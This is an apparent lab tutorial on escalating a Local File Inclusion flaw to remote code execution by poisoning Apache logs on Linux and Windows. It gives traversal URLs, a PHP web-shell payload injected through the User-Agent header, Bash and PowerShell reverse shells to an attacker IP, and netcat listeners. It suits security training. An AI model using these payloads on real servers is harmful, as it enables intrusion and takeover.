Exploiting LFI with Log Poisoning

Published on March 13, 2025

---

In this tutorial, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) using log poisoning. This technique involves injecting malicious code into server logs, which can then be included and executed via LFI. We'll cover both Linux and Windows exploitation.

Linux Exploitation

1. Identify Log File Location

Apache logs are typically located at /var/log/apache2/access.log. We can retrieve the log file using LFI:

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log

2. Poison the Apache Log File

The User-Agent field in HTTP requests is logged by Apache. We modify it to contain a PHP payload for command execution:

User-Agent: <?php echo system($_GET['cmd']); ?>

3. Execute the Malicious Code

Once our payload is in the log file, we can include it using LFI:

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=id

4. Getting a Reverse Shell

To gain full control, we use a Bash reverse shell:

bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"

URL encode before injecting:

bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22

Start a listener:

nc -nvlp 4444

Windows Exploitation

1. Verify the LFI Vulnerability

Test if the application has LFI by including win.ini:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../windows/win.ini

If the file is displayed, LFI is confirmed.

2. Identify the Apache Log File Path

On XAMPP, Apache logs are typically stored at:

C:\xampp\apache\logs\access.log

Access the log file via LFI:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log

If log content is visible, proceed to log poisoning.

3. Poison the Apache Log File

Inject a malicious PHP payload via User-Agent:

curl -A "<?php echo system($_GET['cmd']); ?>" http://192.168.50.193/

The payload is logged and will execute via LFI.

4. Execute Commands

Execute the dir command via LFI:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log&cmd=dir

Alternative Solutions

If spaces break your command, replace them with %20:

http://192.168.50.193/meteor/index.php?page=../../../../../../../../xampp/apache/logs/access.log&cmd=dir%20C:\xampp\htdocs

If cmd is blocked, use PowerShell:

powershell%20-Command%20"Get-ChildItem%20C:\xampp\htdocs"

5. Obtain a Reverse Shell

To gain full control, use PowerShell to create a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);..."

Start a Netcat listener on your machine:

nc -nvlp 4444

Conclusion

By poisoning log files and leveraging LFI, we achieved remote code execution on both Linux and Windows. Understanding log file locations and encoding techniques is crucial for successful exploitation.